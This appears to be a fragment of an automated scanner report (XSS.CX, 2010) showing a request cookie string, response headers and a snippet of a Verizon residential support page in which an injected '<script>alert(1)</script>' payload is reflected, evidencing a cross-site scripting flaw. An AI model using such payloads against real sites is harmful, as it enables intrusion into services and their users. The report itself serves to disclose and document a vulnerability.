MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 47079
Expires: Sun, 21 Nov 2010 18:14:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sun, 21 Nov 2010 18:14:35 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXf21ed<script>alert(1)</script>84b122a3aa </span>
...[SNIP]...

Report generated by XSS.CX at Sun Nov 21 21:04:57 CST 2010.